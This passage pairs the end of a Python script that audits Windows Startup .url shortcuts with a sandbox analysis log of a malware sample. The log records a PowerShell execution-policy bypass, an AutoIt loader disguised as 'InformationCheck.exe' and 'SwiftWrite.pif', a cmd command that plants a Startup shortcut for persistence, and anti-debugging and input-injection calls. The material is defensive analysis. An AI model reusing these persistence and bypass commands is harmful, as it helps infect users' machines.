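    low = target.lower()
    if re.match(r"^https?://", low):
        return "web"
    is_unc = low.startswith("\\\\")
    is_drive = re.match(r"^[a-z]:\\", low) is not None
    if not (is_unc or is_drive):
        return "unknown"
    ext = ntpath.splitext(low)[1]  # ntpath handles backslashes on any host OS
    if ext in SCRIPT_EXTS:
        kind = "script"
    elif ext in EXE_EXTS:
        kind = "executable"
    else:
        kind = "other"
    return ("unc_" if is_unc else "local_") + kind


def audit_url_text(text: str, name: str) -> Dict[str, object]:
    """One finding per .url file: a Startup shortcut should open a web page, not run local code."""
    ini = parse_ini(text)
    target = normalize_target(ini.get("internetshortcut", {}).get("url", ""))
    kind = classify(target)
    suspicious = kind.endswith(("_script", "_executable")) or kind.startswith("unc_")
    return {"file": name, "target": target, "kind": kind, "suspicious": suspicious}


def scan_startup(folders: Optional[List[str]] = None) -> List[Dict[str, object]]:
    """Audit every .url file in the given (or default) Startup folders that exist."""
    findings: List[Dict[str, object]] = []
    for folder in folders or STARTUP_DIRS:
        if not os.path.isdir(folder):
            continue
        for entry in os.scandir(folder):
            if entry.is_file() and entry.name.lower().endswith(".url"):
                with open(entry.path, encoding="utf-8", errors="replace") as fh:
                    findings.append(audit_url_text(fh.read(), entry.path))
    return findings


if __name__ == "__main__":
    print(audit_url_text(SAMPLE_URL_FILE, "SwiftWrite.url"))
    for finding in scan_startup():
        print(finding)
```

Run on a live host it walks both Startup folders; the sample reproduces the report's artifact and is classified local_script. A .url whose target is an http(s) address is the normal case and is not flagged, so the audit stays quiet on legitimate shortcuts.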
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797854514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00007FF797854514
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_004E59B3
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00475EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_00475EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_00FA59B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F35EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_00F35EDA
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004833B7
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5071 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4799 Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe API coverage: 3.4 %
Source: C:\Users\Public\InformationCheck.exe API coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif API coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978AB7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF7978B72A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B71F4 FindFirstFileW,FindClose, 0_2_00007FF7978B71F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978ABC70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF7978BA874
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF7978AC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA4F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF7978B6428
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872F50 FindFirstFileExW, 0_2_00007FF797872F50
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C4005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_004C494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CC2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD14 FindFirstFileW,FindClose, 3_2_004CCD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_004CCD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CFA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F84005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8494A GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00F8494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 8_2_00F8CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD14 FindFirstFileW,FindClose, 8_2_00F8CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F83CE2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797851D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF797851D80
Source: powershell.exe, 00000001.00000002.2033706127.000001C734A55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000001.00000002.2033706127.000001C734A07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\InformationCheck.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0A00 BlockInput, 0_2_00007FF7978C0A00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF7978337B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797855BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_00007FF797855BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C7634 LoadLibraryA,GetProcAddress, 0_2_00007FF7978C7634
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 0_2_00007FF79789D868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978557E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7978557E4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978559C8 SetUnhandledExceptionFilter, 0_2_00007FF7978559C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797878FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF797878FE4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF79786AF58
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048A354 SetUnhandledExceptionFilter, 3_2_0048A354
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0048A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00F4A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4A354 SetUnhandledExceptionFilter, 8_2_00F4A354

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00007FF79789CE68
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF7978337B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978A9420 SendInput,keybd_event, 0_2_00007FF7978A9420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AD1A4 mouse_event, 0_2_00007FF7978AD1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00007FF79789C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00007FF79789D540
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1693624835.000002B512320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700160371.000002B512246000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, InformationCheck.exe, SwiftWrite.pif Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786FD20 cpuid 0_2_00007FF79786FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786BEF8 GetSystemTimeAsFileTime, 0_2_00007FF79786BEF8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797892BCF GetUserNameW, 0_2_00007FF797892BCF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00007FF797872650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797851D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF797851D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: file.exe, 00000000.00000003.1700160371.000002B512246000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF7978C4074
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00007FF7978C3940
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 3_2_004D696E
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 3_2_004D6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F9696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 8_2_00F9696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F96E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00F96E32